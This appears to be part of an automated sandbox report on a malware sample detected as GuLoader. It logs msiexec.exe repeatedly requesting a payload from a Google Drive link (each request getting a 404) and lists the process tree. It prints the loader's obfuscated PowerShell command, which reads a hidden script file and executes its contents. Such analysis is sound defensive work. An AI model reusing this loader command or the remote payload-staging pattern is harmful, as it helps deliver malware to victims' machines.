2025-01-11 03:27:57 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 52 32 31 78 7a 55 4c 30 30 47 74 39 4f 53 49 7a 50 67 74 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uR21xzUL00Gt9OSIzPgtAQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.11	50031	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:58 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:58 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:58 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-VPnp8_E9QK63X_UF6l10Vw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.11	50032	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:59 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:59 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQUqSEqw1JzMQWdJetYHYsuuA5QjEHsQIFViLdOidjbSAAHZj_rMSnkiZNcRxqEHnOy Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:59 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-mHHlDYj-fx5H8huoT0kjpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:59 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 74 70 72 7a 38 64 5a 32 65 37 71 67 62 51 72 74 4c 62 69 71 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="atprz8dZ2e7qgbQrtLbiqw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.11	50033	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:28:00 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:28:00 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:28:00 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-o93ua-_OwGeY-6OVrOeqBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.11	50034	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:28:01 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:28:01 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQtP_AYJThkUi3_ykgVEaAQz7AKCRpKVGt6Auzw5YvL-Mhx0DQOHov5P9kvHxRN-qSR Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:28:01 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-oe2mNaTjgDuKNzqZHWD6hQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:28:01 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 77 2d 74 38 33 30 70 6d 73 64 66 31 4a 41 34 56 4c 6d 7a 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Vw-t830pmsdf1JA4VLmzbw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.11	50035	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:28:02 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:28:03 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:28:03 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-2JwwJCKiZyy9oPhDtG99cQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.11	50036	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:28:04 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:28:04 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC61xJMYbWgkzkdXb05ToueUhVmXGKXTx1wW1Sk756TpbwluwyybH7wCoGzx_qSErBKQ Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:28:04 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-KE4JNOS-28Af3EeUz6cQzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:28:04 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 41 6d 30 38 53 6e 39 38 51 4d 68 51 70 74 51 77 31 6d 32 32 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LAm08Sn98QMhQptQw1m22g">*{margin:0;padding:0}html,code{font:15px/22px arial

Target ID:	0
Start time:	22:25:59
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\yMXFgPOdf2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\yMXFgPOdf2.exe"
Imagebase:	0x400000
File size:	554'816 bytes
MD5 hash:	54327A2F6C75BB2C549A5A98A462A588
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	22:26:00
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)"
Imagebase:	0x450000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1837590498.000000000A812000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	22:26:00
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	22:26:46
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xb0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2599692281.0000000004F02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false